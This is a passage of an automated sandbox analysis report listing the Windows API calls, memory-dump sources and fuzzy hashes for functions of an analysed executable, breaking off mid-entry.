                                                                                                • Part of subcall function 00A09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A09BB2
                                                                                              • DragQueryPoint.SHELL32(?,?), ref: 00A89147
                                                                                                • Part of subcall function 00A87674: ClientToScreen.USER32(?,?), ref: 00A8769A
                                                                                                • Part of subcall function 00A87674: GetWindowRect.USER32(?,?), ref: 00A87710
                                                                                                • Part of subcall function 00A87674: PtInRect.USER32(?,?,00A88B89), ref: 00A87720
                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00A891B0
                                                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00A891BB
                                                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00A891DE
                                                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00A89225
                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00A8923E
                                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00A89255
                                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00A89277
                                                                                              • DragFinish.SHELL32(?), ref: 00A8927E
                                                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00A89371
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                              • API String ID: 221274066-3440237614
                                                                                              • Opcode ID: ef7fa7ca58cdb99c6eecbceeea0b87d197c082df38e47358a11b592680f19f8c
                                                                                              • Instruction ID: 636dbbb72225a79e5461db10300cb11b1f9eff9ef2a82c3dac5b5a45e95735bf
                                                                                              • Opcode Fuzzy Hash: ef7fa7ca58cdb99c6eecbceeea0b87d197c082df38e47358a11b592680f19f8c
                                                                                              • Instruction Fuzzy Hash: 21615D71108305AFC701EFA4DD85EAFBBE8EFC9750F00092DF596961A1DB709A49CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A6C4B0
                                                                                              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00A6C4C3
                                                                                              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00A6C4D7
                                                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00A6C4F0
                                                                                              • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00A6C533
                                                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00A6C549
                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A6C554
                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00A6C584
                                                                                              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00A6C5DC
                                                                                              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00A6C5F0
                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00A6C5FB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                              • String ID:
                                                                                              • API String ID: 3800310941-3916222277
                                                                                              • Opcode ID: e9d4943bac0c99040ff763fa69ee49863f2a10e9480934a261c801ba0bccc62e
                                                                                              • Instruction ID: 33df80cbb936be9bed4eb0c385fbc4dbb9560729cec7fd53b9ac1e6abc35db76
                                                                                              • Opcode Fuzzy Hash: e9d4943bac0c99040ff763fa69ee49863f2a10e9480934a261c801ba0bccc62e
                                                                                              • Instruction Fuzzy Hash: 1D512AB1540708BFDB21DFA4CD88ABA7BBCEB08764F00441AF99696650DB34E9459F60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00A88592
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00A885A2
                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00A885AD
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A885BA
                                                                                              • GlobalLock.KERNEL32 ref: 00A885C8
                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00A885D7
                                                                                              • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00A885E0
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A885E7
                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0), ref: 00A885F8
                                                                                              • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00A8FC38,?), ref: 00A88611
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00A88621
                                                                                              • GetObjectW.GDI32(?,00000018,?), ref: 00A88641
                                                                                              • CopyImage.USER32 ref: 00A88671
                                                                                              • DeleteObject.GDI32(?), ref: 00A88699
                                                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00A886AF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                              • String ID:
                                                                                              • API String ID: 3840717409-0
                                                                                              • Opcode ID: bad0cada92480e65805800fc0d2dcbb0f0fe4a8727d6e2ffc20640e1e1f52636
                                                                                              • Instruction ID: 1b55839844b8e759b6a3c729979b924bd72ab72c7506aa0d415a65e3d8ae0b1f
                                                                                              • Opcode Fuzzy Hash: bad0cada92480e65805800fc0d2dcbb0f0fe4a8727d6e2ffc20640e1e1f52636
                                                                                              • Instruction Fuzzy Hash: B341FC75600204AFDB11EFA5DC88EAA7BBDFF89721F104168F905D7250EB349902DF60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(00000000), ref: 00A61502
                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 00A6150B
                                                                                              • VariantClear.OLEAUT32(?), ref: 00A61517
                                                                                              • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00A615FB
                                                                                              • VarR8FromDec.OLEAUT32(?,?), ref: 00A61657
                                                                                              • VariantInit.OLEAUT32(?), ref: 00A61708
                                                                                              • SysFreeString.OLEAUT32(?), ref: 00A6178C
                                                                                              • VariantClear.OLEAUT32(?), ref: 00A617D8
                                                                                              • VariantClear.OLEAUT32(?), ref: 00A617E7
                                                                                              • VariantInit.OLEAUT32(00000000), ref: 00A61823
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                              • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                              • API String ID: 1234038744-3931177956
                                                                                              • Opcode ID: d28e1a5d43bbd9c86da88546cedd4df4a3308373ea9aebf097b75c6344427594
                                                                                              • Instruction ID: 25d7db74bd85e3530b5707c065890973a330f6cae0689c7aed5557fc15a01e2f
                                                                                              • Opcode Fuzzy Hash: d28e1a5d43bbd9c86da88546cedd4df4a3308373ea9aebf097b75c6344427594
                                                                                              • Instruction Fuzzy Hash: 84D1D072A00219EFDB10DF65E885B79FBB5BF84700F18845AE447AB581EB30EC41DBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 009F9CB3: _wcslen.LIBCMT ref: 009F9CBD
                                                                                                • Part of subcall function 00A7C998: CharUpperBuffW.USER32(?,?), ref: 00A7C9B5
                                                                                                • Part of subcall function 00A7C998: _wcslen.LIBCMT ref: 00A7C9F1
                                                                                                • Part of subcall function 00A7C998: _wcslen.LIBCMT ref: 00A7CA68
                                                                                                • Part of subcall function 00A7C998: _wcslen.LIBCMT ref: 00A7CA9E
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A7B6F4
                                                                                              • RegOpenKeyExW.ADVAPI32 ref: 00A7B772
                                                                                              • RegDeleteValueW.ADVAPI32 ref: 00A7B80A
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00A7B87E
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00A7B89C
                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00A7B8F2
                                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A7B904
                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00A7B922
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00A7B983
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00A7B994
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                              • API String ID: 146587525-4033151799
                                                                                              • Opcode ID: 5c9affa7fb9150a5051074670c5fd915e63be12d6c8e68b7027df387da110661
                                                                                              • Instruction ID: bb9b448d182fc89e90d752ddca5a9df9d7b0b4e692c64136627a86786189f0f4
                                                                                              • Opcode Fuzzy Hash: 5c9affa7fb9150a5051074670c5fd915e63be12d6c8e68b7027df387da110661
                                                                                              • Instruction Fuzzy Hash: 07C18E70214201AFD714DF14C895F2ABBE5BF84318F14C55CF5AA8B2A2CB71ED45CBA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 00A725D8
                                                                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00A725E8
                                                                                              • CreateCompatibleDC.GDI32(?), ref: 00A725F4
                                                                                              • SelectObject.GDI32(00000000,?), ref: 00A72601
                                                                                              • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00A7266D
                                                                                              • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00A726AC
                                                                                              • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00A726D0
                                                                                              • SelectObject.GDI32(?,?), ref: 00A726D8
                                                                                              • DeleteObject.GDI32(?), ref: 00A726E1
                                                                                              • DeleteDC.GDI32(?), ref: 00A726E8
                                                                                              • ReleaseDC.USER32(00000000,?), ref: 00A726F3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                              • String ID: (
                                                                                              • API String ID: 2598888154-3887548279
                                                                                              • Opcode ID: 180f1020b795e63587e18649e5952b4d1896f733ec9db2370677cc2c4bc28faf
                                                                                              • Instruction ID: 14d31db7b44eddc74b8a8a5fb523517ead1f928475318abce3b8cfac2b0e2f24
                                                                                              • Opcode Fuzzy Hash: 180f1020b795e63587e18649e5952b4d1896f733ec9db2370677cc2c4bc28faf
                                                                                              • Instruction Fuzzy Hash: A061C275D00219EFCF14CFE4D984AAEBBB6FF48310F20852AE959A7250E774A9518F60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___free_lconv_mon.LIBCMT ref: 00A2DAA1
                                                                                                • Part of subcall function 00A2D63C: _free.LIBCMT ref: 00A2D659
                                                                                                • Part of subcall function 00A2D63C: _free.LIBCMT ref: 00A2D66B
                                                                                                • Part of subcall function 00A2D63C: _free.LIBCMT ref: 00A2D67D
                                                                                                • Part of subcall function 00A2D63C: _free.LIBCMT ref: 00A2D68F
                                                                                                • Part of subcall function 00A2D63C: _free.LIBCMT ref: 00A2D6A1
                                                                                                • Part of subcall function 00A2D63C: _free.LIBCMT ref: 00A2D6B3
                                                                                                • Part of subcall function 00A2D63C: _free.LIBCMT ref: 00A2D6C5
                                                                                                • Part of subcall function 00A2D63C: _free.LIBCMT ref: 00A2D6D7
                                                                                                • Part of subcall function 00A2D63C: _free.LIBCMT ref: 00A2D6E9
                                                                                                • Part of subcall function 00A2D63C: _free.LIBCMT ref: 00A2D6FB
                                                                                                • Part of subcall function 00A2D63C: _free.LIBCMT ref: 00A2D70D
                                                                                                • Part of subcall function 00A2D63C: _free.LIBCMT ref: 00A2D71F
                                                                                                • Part of subcall function 00A2D63C: _free.LIBCMT ref: 00A2D731
                                                                                              • _free.LIBCMT ref: 00A2DA96
                                                                                                • Part of subcall function 00A229C8: HeapFree.KERNEL32(00000000,00000000), ref: 00A229DE
                                                                                                • Part of subcall function 00A229C8: GetLastError.KERNEL32(00000000,?,00A2D7D1,00000000,00000000,00000000,00000000,?,00A2D7F8,00000000,00000007,00000000,?,00A2DBF5,00000000,00000000), ref: 00A229F0
                                                                                              • _free.LIBCMT ref: 00A2DAB8
                                                                                              • _free.LIBCMT ref: 00A2DACD
                                                                                              • _free.LIBCMT ref: 00A2DAD8
                                                                                              • _free.LIBCMT ref: 00A2DAFA
                                                                                              • _free.LIBCMT ref: 00A2DB0D
                                                                                              • _free.LIBCMT ref: 00A2DB1B
                                                                                              • _free.LIBCMT ref: 00A2DB26
                                                                                              • _free.LIBCMT ref: 00A2DB5E
                                                                                              • _free.LIBCMT ref: 00A2DB65
                                                                                              • _free.LIBCMT ref: 00A2DB82
                                                                                              • _free.LIBCMT ref: 00A2DB9A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                              • String ID:
                                                                                              • API String ID: 161543041-0
                                                                                              • Opcode ID: b2507592b7fd88b268ca1f13bfd2e7b521e0a9021f9a80a7a12636b8c2b89b73
                                                                                              • Instruction ID: 94dc03fcc23ac4ba594be561765488bad899c2659823ee97be16c92e2bc7cd59
                                                                                              • Opcode Fuzzy Hash: b2507592b7fd88b268ca1f13bfd2e7b521e0a9021f9a80a7a12636b8c2b89b73
                                                                                              • Instruction Fuzzy Hash: 6D315732604224AFEB22AB3CF945B5AB7E9FF44360F514839E449D7192DA30EC808B20
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00A5369C
                                                                                              • _wcslen.LIBCMT ref: 00A536A7
                                                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00A53797
                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00A5380C
                                                                                              • GetDlgCtrlID.USER32 ref: 00A5385D
                                                                                              • GetWindowRect.USER32(?,?), ref: 00A53882
                                                                                              • GetParent.USER32(?), ref: 00A538A0
                                                                                              • ScreenToClient.USER32(00000000), ref: 00A538A7
                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00A53921
                                                                                              • GetWindowTextW.USER32 ref: 00A5395D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                              • String ID: %s%u
                                                                                              • API String ID: 4010501982-679674701
                                                                                              • Opcode ID: 71821e763fdb467158f7209f716e600690f692265d956d98828fbf2cb2158eec
                                                                                              • Instruction ID: fe094e045df4abbd8375dc30f572e63641499d03939fa4bf7629ab8af805d64b
                                                                                              • Opcode Fuzzy Hash: 71821e763fdb467158f7209f716e600690f692265d956d98828fbf2cb2158eec
                                                                                              • Instruction Fuzzy Hash: 4B91E772204606EFDB19DF64C894BEAF7A8FF84391F004529FD99C6150DB30EA59CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00A54994
                                                                                              • GetWindowTextW.USER32 ref: 00A549DA
                                                                                              • _wcslen.LIBCMT ref: 00A549EB
                                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 00A549F7
                                                                                              • _wcsstr.LIBVCRUNTIME ref: 00A54A2C
                                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00A54A64
                                                                                              • GetWindowTextW.USER32 ref: 00A54A9D
                                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00A54AE6
                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00A54B20
                                                                                              • GetWindowRect.USER32(?,?), ref: 00A54B8B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                              • String ID: ThumbnailClass
                                                                                              • API String ID: 1311036022-1241985126
                                                                                              • Opcode ID: 689a92b948fa35bcdfcc3f46bf813cc32325649aafd60f633fa3096313fa6e5b
                                                                                              • Instruction ID: 7f1444b27fc0b16df2b8a69e203aab879eb4688b34d66688b5400542e10c5c31
                                                                                              • Opcode Fuzzy Hash: 689a92b948fa35bcdfcc3f46bf813cc32325649aafd60f633fa3096313fa6e5b
                                                                                              • Instruction Fuzzy Hash: CE91C2711043059FDB04DF14C985FAA77E8FF88359F048469FD899A196EB30ED89CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A09BB2
                                                                                              • PostMessageW.USER32 ref: 00A88D5A
                                                                                              • GetFocus.USER32 ref: 00A88D6A
                                                                                              • GetDlgCtrlID.USER32 ref: 00A88D75
                                                                                              • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00A88E1D
                                                                                              • GetMenuItemInfoW.USER32 ref: 00A88ECF
                                                                                              • GetMenuItemCount.USER32(?), ref: 00A88EEC
                                                                                              • GetMenuItemID.USER32(?,00000000), ref: 00A88EFC
                                                                                              • GetMenuItemInfoW.USER32 ref: 00A88F2E
                                                                                              • GetMenuItemInfoW.USER32 ref: 00A88F70
                                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A88FA1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                              • String ID: 0
                                                                                              • API String ID: 1026556194-4108050209
                                                                                              • Opcode ID: 71419764e9c69fe56525625d8b9188537f961458c81c300ed3aeb8da1b3128df
                                                                                              • Instruction ID: ac64070170713593d2c56abafc5d4725f68f5753eb95d69593e96b6ff004924a
                                                                                              • Opcode Fuzzy Hash: 71419764e9c69fe56525625d8b9188537f961458c81c300ed3aeb8da1b3128df
                                                                                              • Instruction Fuzzy Hash: 59819E715083019FDB10EF24D984AAB7BE9FF88764F540929FA8597291DF38DD01CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00A7CC64
                                                                                              • RegOpenKeyExW.ADVAPI32 ref: 00A7CC8D
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00A7CD48
                                                                                                • Part of subcall function 00A7CC34: RegCloseKey.ADVAPI32(?), ref: 00A7CCAA
                                                                                                • Part of subcall function 00A7CC34: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00A7CCBD
                                                                                                • Part of subcall function 00A7CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW,?,?,00000000), ref: 00A7CCCF
                                                                                                • Part of subcall function 00A7CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00A7CD05
                                                                                                • Part of subcall function 00A7CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00A7CD28
                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00A7CCF3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                              • API String ID: 2734957052-4033151799
                                                                                              • Opcode ID: be98ebf8f2b2f86ab4c0fcdd340b9ae14e98f474235757da09bd31f30c6fd16f
                                                                                              • Instruction ID: d9ec58c1701caeb6b1ec1c9274c60b611e9152a1cfbe819fccc213c05c084ee6
